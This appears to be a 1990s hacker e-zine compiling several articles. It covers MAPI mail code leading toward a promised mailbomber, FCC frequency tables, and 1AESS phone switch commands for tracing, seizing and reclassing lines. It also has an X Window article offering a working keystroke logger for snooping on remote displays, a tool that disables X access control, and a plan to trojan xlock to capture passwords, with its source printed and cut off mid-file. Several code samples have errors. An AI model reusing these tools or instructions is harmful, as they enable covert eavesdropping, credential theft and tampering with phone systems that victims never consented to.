     The Message Stores are the messages you have under an inbox for example. 
Just look at Exchange's or Netscape's inbox, and you are looking at a MAPI 
Message Store. ( Well the Exchange is probably a better example, since
Netscape uses the Internet standards, while Exchange does MAPI, and 
internet.)
     The Address Book, is a gay little Microslut invention, that contains a 
list of recipents for messages. ( i say gay, because it is a retarded name.)
     And finally, the Transport providers are the link between a local system 
to the remote systems ( i.e.  Internet)


Simple MAPI
^^^^^^^^^^^
     Ok, Simple MAPI is here to provide us with the functions to establish a 
MAPI session, perform messaging functions, and close down the connection.

               A list of MAPI Calls
        [================================================================]
        | Simple MAPI Call                        Description            |
        |================================================================|
        | MAPILogon                          Log on to service           |
        | MAPILogoff                         Log off from service        |
        | MAPIFreeBuffer                     Free all allocated memory   |
        | MAPISendMail                       Send a piece of mail        |
        | MAPISendDocuments                  Send file(s) in a message   |
        | MAPIFindNext                       Find Messages               |
        | MAPIReadMail                       Get Messages                |
        | MAPISaveMail                       Save Messages               |
        | MAPIDeleteMail                     Delete Messages             |
        | MAPIAddress                        ----\                       |
        | MAPIDetails                        -----\                      |
        | MAPIResolveName                    Addressing Specifics        |
        |================================================================|


     The quickest and easiest way to use Simple MAPI is by using 
MAPISendDocuments . You can use this function to create a standard message
with a file attachment ( or attachments). The following my not seem to useful
now, but it is a building block for our next part of this infosheet. Anyway,
the example simply embeds your autoexec.bat into a message.

     To compile : cl sendauto.c userlib32.lib

Using MAPISendDocuments:

// Wow look at me! - i'm sendauto.c

#include <windows.h>
#include <mapi.h>

LPMAPISENDDOCUMENTS lpfnMAPISendDocuments;

void SendMsg( HWND hwnd)
{
     (*lpfnMAPISendDocuments)((ULONG)hwnd, ";" "C:\\AUTOEXEC.BAT",
     "AUTOEXEC.BAT", 0);
     MessageBox(hwnd, "Message Sent", "" MB_OK);
}

LRESULT CALLBACK WndProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
     switch(uMsg)
     {
          case WM_LBUTTONDOWN:
               SendMSG(hwnd);
               break;
          case WM_DESTROY:
               PostQuitMessage(0);
               break;
          default:
          return DefWindowProc(hwnd, uMsg, LPARAM lParam);
     }
     return 0;
}

int WINAPI WinMAin(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR d3,
int nCmdShow)
{
     MSG msg;
     HWND hwnd;
     WNDCLASS wndClass;
     HANDLE hMAPILib;

     hMAPILib = LoadLibrary("MAPI32.DLL");
     lpfnMAPISendDocuments = (LPMAPISENDDOCUMENTS)GetProcAddress(
     hMAPILib, "MAPISendDocuments");

     if (hPrevInstance == NULL)
     {
     memset(&wndClass, 0 , sizeof(wndClass));
     wndClass.style = CS_HREDRAW | CS_VREDRAW;
          wndClass.lpfnWndProc = WndProc;
          wndClass.hInstance = hInstance;
          wndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
          wndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
          wndClass.lpszClassName = "HELLO";
          if (!RegisterClass(&wndClass)) return FALSE;
     }

     hwnd = CreateWindow("HELLO", "HELLO" WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, 
     0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);
     ShowWindow(hwnd, nCmdShow);
     UpdateWindow(hwnd);
     while (GetMessage(&msg, NULL, 0, 0,))
          DispatchMessage(&msg);
     FreeLibrary(hMAPILib);
     return msg.wParam;
}


MAPISendMail
^^^^^^^^^^^^
     A more flexible and easier way to  send a message is thru MAPISendMail
With a few simple calls to the API, and 2 structures, you can create a 
message with a recipent and an actual message.
     Basically, the following code starts off with creating the structures 
you need to fill out the message, and it then calls MAPILogin to log on to 
the MAPI transport protocol ( in this case, SMTP , since it is internet 
e-mail), it then sends the message, and logs off with MAPILogoff.
        By the way, this is a simple command line program.

mailbill.c
^^^^^^^^^^

// lets mailbill.c (linton) and tell him to get a life
#include <stdio.h>
#include <windows.h>
#include <mapi.h>

LPMAPISENDMAIL lpfnMAPISendMail;
LPMAPILOGON lpfnMAPILogon;
LPMAPILOGOFF lpfnMAPILogoff;

MapiRecipDesc recipent =
{
       0, MAPI_TO, "Bill Clinton", "SMTP:president@whitehouse.gov",
       0, NULL
};

MapiMessage message =
{
       0, "Greetings" "Bill,\n give up your crazy Communications Decency Act,
       and your Clipper Chip project and come out with your hands up!",
       NULL, NULL, NULL, 0, NULL, 1, &recipent, 0, NULL
};

void main(void)
{
       LHANDLE lhSession;
       HANDLE hMAPILib;

       hMAPILib = LoadLibrary("MAPI32.DLL");
       lpfnMAPILogon = (LPMAPILOGON)GetProcAddress(hMAPILib, "MAPILogin");
       lpfnMAPISendMail = (LPMAPISENDMAIL)GetProcAddress(hMAPILib,
       "MAPISendMail");
       lpfnMAPILogoff = (LPMAPILOGOFF)GetProcAddress(hMAPILib, "MAPILogoff");

       (*lpfnMAPILogin)(0,NULL,NULL, MAPI_ALLOW_OTHERS, 0, &lhSession);
       (*lpfnMAPISendMAil)(lhSession, 0, &message, 0,0);
       (*lpfnMAPILogoff)(lhSession,0,0,0);
       printf("Message to the White House is sent.\n");

       FreeLibrary(hMAPILib);
}
     This program will work best if you already have your ISP connection 
going, so start that up first. Oh, and by the way, these are all ment for
Visual C++ 4.0, i dont know how well compile, or if they compile under 2.0
or below.

     Ok, well this is all for this month, next month i will show you a bit
more about MAPI, and then i will give you the code to the MAPI Mailbomber,
which is what the article is supposed to be all about.
_____________________________________________________________                        
                        
                        -------------------------------
                       --=[FCC Frequency Allocations]=--
                             Written by Keystroke
                        -------------------------------

FREQUENCY RANGE     ABBREVIATION        CLASSIFICATION
30Hz-300Hz          ELF            Extremely Low frequency
300Hz-3kHz          VF             Voice frequency
3kHz-30kHz          VLF            Very Low frequency
30kHz-300kHz        LF             Low frequency
300kHz-3MHz         MF             Medium frequency
3MHz-30MHz          HF             High frequency
30MHz-300MHz        VHF            Very high frequency
0.3GHz-3GHz         UHF            Ultrahigh frequency
3GHz-30GHz          SHF            Super high frequency
30GHz-300GHz        EHF            Extremely high frequency
0.3THz-4.29THz      IR             Infared
4.29THz-6.98THz                         Visible Light
6.98THz-100THz      UV             Ultraviolet
100PHz-1000EHz                     X-rays

FREQUENCY (kHz)     ALLOCATIONS
300                 Marine
400                 Aviation
500-1600                 AM Radio
2000                Marine, Aviation, and Land Mobil
3000                Amateur, Land Mobile

FREQUENCY (MHZ)     ALLOCATIONS
3                   Marine
4                   Marine
5                   Land Mobile
6                   Marine, Aviation
7                   Amatuer, Aviation
8                   Land Mobile
9                   Marine
10                  Marine, Aviation, Shortwave
16                  Aviation, Shortwave
20                  Aviation, Shortwave
30                  Amateur, Land Mobile

FREQUENCY (MHZ)     ALLOCATIONS
30                  Land Mobile, Government
40                  Government
50                  Government
60                  TV Channels 2-4 Broadcast
70                  Aviation R/C
80                  Land Mobile
90                  TV Channels 5-6 Broadcast
100                 FM Broadcast
160                 Amateur Land Mobile
200                 TV Channels 7-13 Broadcast
300                 Government Satellite

TIP:  Put a few scanners around your room, tune them to the same TV station, 
put your TV on that station, and listen is Surround Sound! :P

FREQUENCY (MHZ)     ALLOCATIONS
300                 Aviation
400                 Government Satellite
500                 General Mobile Radio Service, Land Mobile 
600                 TV Channels 14-83 Broadcast
700                 TV Channels 14-83 Broadcast
800                 Land Mobile
900                 Land Mobile
1000                Fixed, Microwaves
1600                Aviation
2000                Fixed
3000                Radar

BUGGING FREQUENCIES!!! - http://www.tscm.com/bugfreq.html

There's a file at 
file://oak.oakland.edu/pub/hamradio/docs/misc/fcc.allocations that goes in 
depth on fcc frequency allocations, the above was a general look at the 
frequencies.

Fun Fact #1: A carrier is really a high-frequency signal that is modulated 
with a low-frequency information signal. Thats why a modem is a 
MODulator-DEModulator, it varies the characteristics of high-frequency 
signal, in accordance with the changes in the info. signal (this is 
modulation) and retrives the info (low freq.) from the high-frequency 
modulated carrier signal (this is demodulation).

Fun Fact #2: kilobyte, megabyte, gigabyte, terabyte, pentabyte, exabyte
_____________________________________________________________     
     
                                 -----------     
                                --=[1aESS]=--     
                              Written by Optimus     
                                 -----------     
     
   I got some badass 1aess shit, this is basically just my notes on it all
and some basic need to knows. If it ain't enough for you, you should find
something more technical =). I haven't tested any of this, just passing it
along...
   
   All 1aess commands are typed in caps. Verifacation commands end in '.' and 
change commands end in '!'. The end of line character is ctrl+d not return, 
kinda funky, maybe its the keyboard setup they designed. The backspace key is 
underscore.

Basic Commands:

WHO-RV-.            Shows system info
V-STOP-.            Clears pause buffer (press space to pause)
CI-LIST-.           Lists lines currently being traced
NET-LINE-XXXXXXX0000.         Live Line Trace
T-DN-RDXXXXXXX.               Returns 1 if line is busy, 0 if idle
T-DN-MBXXXXXXX.               Forces a line off hook
T-DN-MTXXXXXXX.               Forces a line on hook
OP:CHAN:MON!             Shows channels being monitored
VFY-DN-30XXXXXXX.        Searches for a free fone line
VFY-LEN-4100000000.      Lists Free LENs
VFY-TNN-XXXXXXXX.        Shows trunk info

Adding lines:

RC:LINE:\           Says that you are adding a line
ORD 1\                   Execute immediatly
TN XXXXXXX\              The telephone number of this line
LEN XXXXXXXX\            The LEN for the line
LCC 1FR\            Line Class Code (List later)
XXX YYY\            YYY is the ld company
!

Changing a line:

RC:LINE;CHG:\            Says that you are changing a line
ORD 1\                   Execute immediatly
TN XXXXXXX\              The line you are changing
LCC DTF\            Changes line to a pay phone
!

LCC Codes:

These are just basic LCC's there are more that I know about, but they seem
kind of irrelevant

DTF  Pay phone
1FR  Flat rate
1MR  Measured Rate
1PC  One Pay Phone
PBM  No ani?
PBX  What it says
CDF  DTF Coin pay phone
CFD  Coinless charge-a-call pay phone
INW  InWATTS 800

Removing A Line:

RC:LINE;OUT:\                 States you are removing a line
ORD 1\                        Says you want to remove it now
TN XXXXXXX\                   Number of which you are removing
!


Thats basically it, I haven't tested anything so I don't have that much
experience with it but, if you do experiment, drop me a ring telling me
how it went at rewt@null.net -- Optimus
_____________________________________________________________
                                
                                -------------
                               --=[X-Toolz]=--
                              Written by lurk3r
                                -------------
                                
This article is not a basic how-to-use-Xwin or even a step-by-step guide. 
It's just a few scripts and ideas for those who aren't able to find anything 
on Xwin and just plain out need a clue. This is also my first article, so 
bear with me. It can only get better. I did include the xhost command though, 
because it is such a major function.

Basic Command:
Enabling the Xhost
$ xhost +

To allow connections from only a single host for whatever reason, such as to 
lessen the chances of someone stumbling upon it from just any server, you 
would use the command..
$ xhost + <IP of server>

Recommended: man xwd and man xwud (to find out about dumping screens, very 
useful) the Xwindows utility.
$ xwd -root localhost:0.0 > SaveFile

Once you've gotten into the server, poked around and decided that you aren't 
able to find any way to get root access or other logins, you may want to try 
some of these ideas out. A good way to start is to run a program such as a 
key recorder, since xwindows are obviously run on the xserver, then all 
keystrokes go through it. The first program you may want to setup is xkey.c,
written by Dominic Giampaolo (nick@cs.maxine.wpi.edu).
To compile type:
gcc -o xkey xkey.c -lX11 -lm

If that doesn't work then your gonna have to RTFM cause I'm not gonna get 
into a deep discussion on compiling.
To run it type:
xkey displayname:0

------------------------------------------------------------ 

#include <stdio.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
#include <X11/Xutil.h>
#include <X11/Shell.h>

char *TranslateKeyCode(XEvent *ev);

Display *d;

void snoop_all_windows(Window root, unsigned long type)

{
  static int level = 0;
  Window parent, *children, *child2;
  unsigned int nchildren;
  int stat, i,j,k;
  
  level++;
  
  stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
  if (stat == FALSE)
  {
     fprintf(stderr, "Can't query window tree...\n");
     return;
  }
  
  if (nchildren == 0)
    return;


  /* For a more drastic indication of the problem being exploited
   * here, you can change these calls to XSelectInput() to something
   * like XClearWindow(d, children[i]) or if you want to be real
   * nasty, do XKillWindow(d, children[i]).  Of course if you do that,
   * then you'll want to remove the loop in main(). 
   *
   * The whole point of this exercise being that I shouldn't be
   * allowed to manipulate resources which do not belong to me.
   */

  XSelectInput(d, root, type);
   
  for(i=0; i < nchildren; i++)
   {
     XSelectInput(d, children[i], type);
     snoop_all_windows(children[i], type);
   }     
   
  XFree((char *)children);
}

void main(int argc, char **argv)
{
  char *hostname;
  char *string;
  XEvent xev;
  int count = 0;
  
  if (argv[1] == NULL)
    hostname = ":0";
  else
    hostname = argv[1];
  
  d = XOpenDisplay(hostname);
  if (d == NULL)
   {
     fprintf(stderr, "Blah, can't open display: %s\n", hostname);
     exit(10);
   }
   
  snoop_all_windows(DefaultRootWindow(d), KeyPressMask);
   
  while(1)
   {
     XNextEvent(d, &xev);
     
     string = TranslateKeyCode(&xev);
     if (string == NULL)
       continue;

     if (*string == '\r')
       printf("\n");
     else if (strlen(string) == 1)
       printf("%s", string);
     else
       printf("<<%s>>", string);
     fflush(stdout);
   }
}

#define KEY_BUFF_SIZE 256
static char key_buff[KEY_BUFF_SIZE];

char *TranslateKeyCode(XEvent *ev)
{
  int count;
  char *tmp;
  KeySym ks;
  
  if (ev)
   {
   count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL);
   key_buff[count] = '\0';
     
   if (count == 0)
    {
      tmp = XKeysymToString(ks);
      if (tmp)
        strcpy(key_buff, tmp);
      else
        strcpy(key_buff, "");
    }
   return key_buff;
   }

  else
    return NULL;
}

------------------------------------------------------------

Since this is a keystroke recorder and not a sniffer, it can be very helpful 
in finding out about the system you are on, and possibly getting you into 
other systems that the user at console connects to, such as FTP sites and 
other shell acounts. I've noticed that alot of students have multiple shells, 
and like to check their mail on multiple systems through one account. If 
you're lucky enough to find one of these guys, you'll be set up for a while.

Another useful tool that I have used is called crowbar.c.
This program can be used after you have a connection to someones display, and 
say someone decides to "xhost -" you.
This program will allow you to XDisableAccessControl()

------------------------------------------------------

#include <stdio.h>
#include <X11/Xlib.h>
#include <ctype.h>

main (int argc, char *argv[])
{
    Display *dpy;
    char *dis = NULL;
    int c;

    dis= argv[1]; 

    if ((dpy = XOpenDisplay(dis))==NULL){
          perror("could not open window");
          exit(0);
     }

     while ((c=getchar())!='q')
          XDisableAccessControl(dpy);

    XCloseDisplay(dpy);
}

------------------------------------------------------------

Another program or thought that may be useful, (if you know how to code) 
would be to install a trojan or trick to get peoples passwords from them. One 
thing that most people might not think anything about when they sit down at 
their desk at school or work is when they see a screen saver on. If you've 
ever been into a place that has lots of computers, even after they have 
closed for the night you will notice that at least 70% of them are left on 
with just a screen saver running. So why not edit the GetPassword routine of 
the screensaver program to capture the passwords that people enter? Anyone 
seeing the process table won't think twice when they see the screensaver 
program running. You'll have to go through and edit this yourself, or in the 
future maybe I or another person in HBS can provide one, but here is the code 
for the screensaver that I have found to be the most widely used.

Xlock.c

------------------------------------------------------------
#include <stdio.h>
#include <signal.h>
#include <string.h>
#include <pwd.h>
#include "xlock.h"
#include <X11/cursorfont.h>
#include <X11/Xatom.h>

extern char *crypt();
extern char *getenv();

char       *ProgramName;        /* argv[0] */
perscreen   Scr[MAXSCREENS];
Display    *dsp = NULL;         /* server display connection */
int         screen;             /* current screen */
void        (*callback) () = NULL;
void        (*init) () = NULL;

static int  screens;            /* number of screens */
static Window win[MAXSCREENS];  /* window used to cover screen */
static Window icon[MAXSCREENS]; /* window used during password typein */
static Window root[MAXSCREENS]; /* convenience pointer to the root window */
static GC   textgc[MAXSCREENS]; /* grphx context used for text rendering */
static long fgcol[MAXSCREENS];  /* used for text rendering */
static long bgcol[MAXSCREENS];  /* background of text screen */
static int  iconx[MAXSCREENS];  /* location of left edge of icon */
static int  icony[MAXSCREENS];  /* location of top edge of icon */
static Cursor mycursor;         /* blank cursor */
static Pixmap lockc;
static Pixmap lockm;            /* pixmaps for cursor and mask */
static char no_bits[] = {0};    /* dummy array for the blank cursor */
static int  passx;              /* position of the ?'s */
static int  passy;
static XFontStruct *font;
static int  sstimeout;          /* screen saver parameters */
static int  ssinterval;
static int  ssblanking;
static int  ssexposures;

#define PASSLENGTH 20
#define FALLBACK_FONTNAME       "fixed"
#define ICONW                   64
#define ICONH                   64

#define AllPointerEventMask \
        (ButtonPressMask | ButtonReleaseMask | \
        EnterWindowMask | LeaveWindowMask | \
        PointerMotionMask | PointerMotionHintMask | \
        Button1MotionMask | Button2MotionMask | \
        Button3MotionMask | Button4MotionMask | \
        Button5MotionMask | ButtonMotionMask | \
        KeymapStateMask)

/* VARARGS1 */
void
error(s1, s2)
    char       *s1, *s2;
{
    fprintf(stderr, s1, ProgramName, s2);
    exit(1);
}

/*
 * Server access control support.
 */

static XHostAddress *XHosts;    /* the list of "friendly" client machines */
static int  HostAccessCount;    /* the number of machines in XHosts */
static Bool HostAccessState;    /* whether or not we even look at the list */
static void
XGrabHosts(dsp)
    Display    *dsp;
{
    XHosts = XListHosts(dsp, &HostAccessCount, &HostAccessState);
    if (XHosts)
        XRemoveHosts(dsp, XHosts, HostAccessCount);
    XEnableAccessControl(dsp);
}

static void
XUngrabHosts(dsp)
    Display    *dsp;
{
    if (XHosts) {
        XAddHosts(dsp, XHosts, HostAccessCount);
        XFree((char *) XHosts);
    }
    if (HostAccessState == False)
        XDisableAccessControl(dsp);
}


/*
 * Simple wrapper to get an asynchronous grab on the keyboard and mouse.
 * If either grab fails, we sleep for one second and try again since some
 * window manager might have had the mouse grabbed to drive the menu choice
 * that picked "Lock Screen..".  If either one fails the second time we print
 * an error message and exit.
 */
static void
GrabKeyboardAndMouse()
{
    Status      status;

    status = XGrabKeyboard(dsp, win[0], True,
                           GrabModeAsync, GrabModeAsync, CurrentTime);
    if (status != GrabSuccess) {
        sleep(1);
        status = XGrabKeyboard(dsp, win[0], True,
                               GrabModeAsync, GrabModeAsync, CurrentTime);

        if (status != GrabSuccess)
            error("%s: couldn't grab keyboard! (%d)\n", status);
    }
    status = XGrabPointer(dsp, win[0], True, AllPointerEventMask,
                          GrabModeAsync, GrabModeAsync, None, mycursor,
                          CurrentTime);
    if (status != GrabSuccess) {
        sleep(1);
        status = XGrabPointer(dsp, win[0], True, AllPointerEventMask,
                              GrabModeAsync, GrabModeAsync, None, mycursor,
                              CurrentTime);

        if (status != GrabSuccess)
            error("%s: couldn't grab pointer! (%d)\n", status);
    }
}


/*
 * Assuming that we already have an asynch grab on the pointer,
 * just grab it again with a new cursor shape and ignore the return code.
 */
static void
XChangeGrabbedCursor(cursor)
    Cursor      cursor;
{
#ifndef DEBUG
    (void) XGrabPointer(dsp, win[0], True, AllPointerEventMask,
                    GrabModeAsync, GrabModeAsync, None, cursor, CurrentTime);
#endif
}


/*
 * Restore all grabs, reset screensaver, restore colormap, close connection.
 */
static void
finish()
{
    XSync(dsp, False);
    if (!nolock && !allowaccess)
        XUngrabHosts(dsp);
    XUngrabPointer(dsp, CurrentTime);
    XUngrabKeyboard(dsp, CurrentTime);
    if (!enablesaver)
        XSetScreenSaver(dsp, sstimeout, ssinterval, ssblanking, ssexposures);
    XFlush(dsp);
    XCloseDisplay(dsp);
}


static int
ReadXString(s, slen)
    char       *s;
    int         slen;
{
    XEvent      event;
    char        keystr[20];
    char        c;
    int         i;
    int         bp;
    int         len;
    int         thisscreen = screen;
    char        pwbuf[PASSLENGTH];

    for (screen = 0; screen < screens; screen++)
        if (thisscreen == screen)
            init(icon[screen]);
        else
            init(win[screen]);
    bp = 0;
    *s = 0;
    while (True) {
        unsigned long lasteventtime = seconds();
        while (!XPending(dsp)) {
            for (screen = 0; screen < screens; screen++)
                if (thisscreen == screen)
                    callback(icon[screen]);
                else
                    callback(win[screen]);
            XFlush(dsp);
            usleep(delay);
            if (seconds() - lasteventtime > timeout) {
                screen = thisscreen;
                return 1;
            }
        }
        screen = thisscreen;
        XNextEvent(dsp, &event);
        switch (event.type) {
        case KeyPress:
          len = XLookupString((XKeyEvent *) & event, keystr, 20, NULL, NULL);
            for (i = 0; i < len; i++) {
                c = keystr[i];
                switch (c) {
                case 8: /* ^H */
                case 127:       /* DEL */
                    if (bp > 0)
                        bp--;
                    break;
                case 10:        /* ^J */
                case 13:        /* ^M */
                    s[bp] = '\0';
                    return 0;
                case 21:        /* ^U */
                    bp = 0;
                    break;
                default:
                    s[bp] = c;
                    if (bp < slen - 1)
                        bp++;
                    else
                        XSync(dsp, True);       /* flush input buffer */
                }
            }
            XSetForeground(dsp, Scr[screen].gc, bgcol[screen]);
            if (echokeys) {
                memset(pwbuf, '?', slen);
                XFillRectangle(dsp, win[screen], Scr[screen].gc,
                               passx, passy - font->ascent,
                               XTextWidth(font, pwbuf, slen),
                               font->ascent + font->descent);
                XDrawString(dsp, win[screen], textgc[screen],
                            passx, passy, pwbuf, bp);
            }
            /*
             * eat all events if there are more than enough pending... this
             * keeps the Xlib event buffer from growing larger than all
             * available memory and crashing xlock.
             */
            if (XPending(dsp) > 100) {  /* 100 is arbitrarily big enough */
                register Status status;
                do {
                    status = XCheckMaskEvent(dsp,
                                      KeyPressMask | KeyReleaseMask, &event);
                } while (status);
                XBell(dsp, 100);
            }
            break;

        case ButtonPress:
            if (((XButtonEvent *) & event)->window == icon[screen]) {
                return 1;
            }
            break;

        case VisibilityNotify:
            if (event.xvisibility.state != VisibilityUnobscured) {
#ifndef DEBUG
                XRaiseWindow(dsp, win[screen]);
#endif
                s[0] = '\0';
                return 1;
            }
            break;

        case KeymapNotify:
        case KeyRelease:
        case ButtonRelease:
        case MotionNotify:
        case LeaveNotify:
        case EnterNotify:
            break;

        default:
            fprintf(stderr, "%s: unexpected event: %d\n",
                    ProgramName, event.type);
            break;
        }
    }
}


static int
getPassword()
{
    char        buffer[PASSLENGTH];
    char        userpass[PASSLENGTH];
    char        rootpass[PASSLENGTH];
    char       *user;
    XWindowAttributes xgwa;
    int         y, left, done;
    struct passwd *pw;

    pw = getpwnam("root");
    strcpy(rootpass, pw->pw_passwd);

    pw = getpwnam(cuserid(NULL));
    strcpy(userpass, pw->pw_passwd);

    user = pw->pw_name;

    XGetWindowAttributes(dsp, win[screen], &xgwa);

    XChangeGrabbedCursor(XCreateFontCursor(dsp, XC_left_ptr));

    XSetForeground(dsp, Scr[screen].gc, bgcol[screen]);
    XFillRectangle(dsp, win[screen], Scr[screen].gc,
                   0, 0, xgwa.width, xgwa.height);

    XMapWindow(dsp, icon[screen]);
    XRaiseWindow(dsp, icon[screen]);

    left = iconx[screen] + ICONW + font->max_bounds.width;
    y = icony[screen] + font->ascent;

    XDrawString(dsp, win[screen], textgc[screen],
                left, y, text_name, strlen(text_name));
    XDrawString(dsp, win[screen], textgc[screen],
                left + 1, y, text_name, strlen(text_name));
    XDrawString(dsp, win[screen], textgc[screen],
                left + XTextWidth(font, text_name, strlen(text_name)), y,
                user, strlen(user));

    y += font->ascent + font->descent + 2;
    XDrawString(dsp, win[screen], textgc[screen],
                left, y, text_pass, strlen(text_pass));
    XDrawString(dsp, win[screen], textgc[screen],
                left + 1, y, text_pass, strlen(text_pass));

    passx = left + 1 + XTextWidth(font, text_pass, strlen(text_pass))
        + XTextWidth(font, " ", 1);
    passy = y;

    y = icony[screen] + ICONH + font->ascent + 2;
    XDrawString(dsp, win[screen], textgc[screen],
                iconx[screen], y, text_info, strlen(text_info));

    XFlush(dsp);

    y += font->ascent + font->descent + 2;

    done = False;
    while (!done) {
        if (ReadXString(buffer, PASSLENGTH))
            break;

       /*
        * we don't allow for root to have no password, but we handle the case
        * where the user has no password correctly; they have to hit return
        * only
        */

        done = !((strcmp(crypt(buffer, userpass), userpass))
               && (!allowroot || strcmp(crypt(buffer, rootpass), rootpass)));

        if (!done && *buffer == NULL) {
            /* just hit return, and it wasn't his password */
            break;
        }
        if (*userpass == NULL && *buffer != NULL) {
            /*
             * the user has no password, but something was typed anyway.
             * sounds fishy: don't let him in...
             */
            done = False;
        }
        /* clear plaintext password so you can't grunge around /dev/kmem */
        memset(buffer, 0, sizeof(buffer));

        XSetForeground(dsp, Scr[screen].gc, bgcol[screen]);

        XFillRectangle(dsp, win[screen], Scr[screen].gc,
                       iconx[screen], y - font->ascent,
                       XTextWidth(font, text_invalid, strlen(text_invalid)),
                       font->ascent + font->descent + 2);

        XDrawString(dsp, win[screen], textgc[screen],
                    iconx[screen], y, text_valid, strlen(text_valid));

        if (done)
            return 0;
        else {
            XSync(dsp, True);   /* flush input buffer */
            sleep(1);
            XFillRectangle(dsp, win[screen], Scr[screen].gc,
                           iconx[screen], y - font->ascent,
                           XTextWidth(font, text_valid, strlen(text_valid)),
                           font->ascent + font->descent + 2);
            XDrawString(dsp, win[screen], textgc[screen],
                       iconx[screen], y, text_invalid, strlen(text_invalid));
            if (echokeys)       /* erase old echo */
                XFillRectangle(dsp, win[screen], Scr[screen].gc,
                               passx, passy - font->ascent,
                               xgwa.width - passx,
                               font->ascent + font->descent);
        }
    }
    XChangeGrabbedCursor(mycursor);
    XUnmapWindow(dsp, icon[screen]);
    return 1;
}


static void
justDisplay()
{
    XEvent      event;

    for (screen = 0; screen < screens; screen++)
        init(win[screen]);
    do {
        while (!XPending(dsp)) {
            for (screen = 0; screen < screens; screen++)
                callback(win[screen]);
            XFlush(dsp);
            usleep(delay);
        }
        XNextEvent(dsp, &event);
#ifndef DEBUG
        if (event.type == VisibilityNotify)
            XRaiseWindow(dsp, event.xany.window);
#endif
    } while (event.type != ButtonPress && event.type != KeyPress);
    for (screen = 0; screen < screens; screen++)
        if (event.xbutton.root == RootWindow(dsp, screen))
            break;
    if (usefirst)
        XPutBackEvent(dsp, &event);
}


static void
sigcatch()
{
    finish();
    error("%s: caught terminate signal.\nAccess control list restored.\n");
}


static void
lockDisplay()
{
    if (!allowaccess) {
#ifdef SYSV
        sigset_t    oldsigmask;
        sigset_t    newsigmask;

        sigemptyset(&newsigmask);
        sigaddset(&newsigmask, SIGHUP);
        sigaddset(&newsigmask, SIGINT);
        sigaddset(&newsigmask, SIGQUIT);
        sigaddset(&newsigmask, SIGTERM);
        sigprocmask(SIG_BLOCK, &newsigmask, &oldsigmask);
#else
        int         oldsigmask;

        oldsigmask = sigblock(sigmask(SIGHUP) |
                              sigmask(SIGINT) |
                              sigmask(SIGQUIT) |
                              sigmask(SIGTERM));
#endif

        signal(SIGHUP, (void (*) ()) sigcatch);
        signal(SIGINT, (void (*) ()) sigcatch);
        signal(SIGQUIT, (void (*) ()) sigcatch);
        signal(SIGTERM, (void (*) ()) sigcatch);

        XGrabHosts(dsp);

#ifdef SYSV
        sigprocmask(SIG_SETMASK, &oldsigmask, &oldsigmask);
#else
        sigsetmask(oldsigmask);
#endif
    }
    do {
        justDisplay();
    } while (getPassword());
}


long
allocpixel(cmap, name, def)
    Colormap    cmap;
    char       *name;
    char       *def;
{
    XColor      col;
    XColor      tmp;
    XParseColor(dsp, cmap, name, &col);
    if (!XAllocColor(dsp, cmap, &col)) {
        fprintf(stderr, "couldn't allocate: %s, using %s instead\n",
                name, def);
        XAllocNamedColor(dsp, cmap, def, &col, &tmp);
    }
    return col.pixel;
}


int
main(argc, argv)
    int         argc;
    char       *argv[];
{
    XSetWindowAttributes xswa;
    XGCValues   xgcv;
    XColor      nullcolor;

    ProgramName = strrchr(argv[0], '/');
    if (ProgramName)
        ProgramName++;
    else
        ProgramName = argv[0];

    srandom(time((long *) 0));  /* random mode needs the seed set. */

    GetResources(argc, argv);

    CheckResources();

    font = XLoadQueryFont(dsp, fontname);
    if (font == NULL) {
        fprintf(stderr, "%s: can't find font: %s, using %s...\n",
                ProgramName, fontname, FALLBACK_FONTNAME);
        font = XLoadQueryFont(dsp, FALLBACK_FONTNAME);
        if (font == NULL)
            error("%s: can't even find %s!!!\n", FALLBACK_FONTNAME);
    }
    screens = ScreenCount(dsp);
    if (screens > MAXSCREENS)
        error("%s: can only support %d screens.\n", MAXSCREENS);
    for (screen = 0; screen < screens; screen++) {
        Screen     *scr = ScreenOfDisplay(dsp, screen);
        Colormap    cmap = DefaultColormapOfScreen(scr);

        root[screen] = RootWindowOfScreen(scr);
        bgcol[screen] = allocpixel(cmap, background, "White");
        fgcol[screen] = allocpixel(cmap, foreground, "Black");

        if (mono || CellsOfScreen(scr) == 2) {
            Scr[screen].pixels[0] = fgcol[screen];
            Scr[screen].pixels[1] = bgcol[screen];
            Scr[screen].npixels = 2;
        } else {
            int         colorcount = NUMCOLORS;
            u_char      red[NUMCOLORS];
            u_char      green[NUMCOLORS];
            u_char      blue[NUMCOLORS];
            int         i;

            hsbramp(0.0, saturation, 1.0, 1.0, saturation, 1.0, colorcount,
                    red, green, blue);
            Scr[screen].npixels = 0;
            for (i = 0; i < colorcount; i++) {
                XColor      xcolor;

                xcolor.red = red[i] << 8;
                xcolor.green = green[i] << 8;
                xcolor.blue = blue[i] << 8;
                xcolor.flags = DoRed | DoGreen | DoBlue;

                if (!XAllocColor(dsp, cmap, &xcolor))
                    break;

                Scr[screen].pixels[i] = xcolor.pixel;
                Scr[screen].npixels++;
            }
            if (verbose)
               fprintf(stderr, "%d pixels allocated\n", Scr[screen].npixels);
        }

     xswa.override_redirect = True;
     xswa.background_pixel = BlackPixelOfScreen(scr);
     xswa.event_mask = KeyPressMask | ButtonPressMask | VisibilityChangeMask;

#ifdef DEBUG
#define WIDTH WidthOfScreen(scr) - 100
#define HEIGHT HeightOfScreen(scr) - 100
#define CWMASK CWBackPixel | CWEventMask
#else
#define WIDTH WidthOfScreen(scr)
#define HEIGHT HeightOfScreen(scr)
#define CWMASK CWOverrideRedirect | CWBackPixel | CWEventMask
#endif

       win[screen] = XCreateWindow(dsp, root[screen], 0, 0, WIDTH, HEIGHT, 0,
                                 CopyFromParent, InputOutput, CopyFromParent,
                                    CWMASK, &xswa);

#ifdef DEBUG
        {
            XWMHints    xwmh;

            xwmh.flags = InputHint;
            xwmh.input = True;
            XChangeProperty(dsp, win[screen],
                            XA_WM_HINTS, XA_WM_HINTS, 32, PropModeReplace,
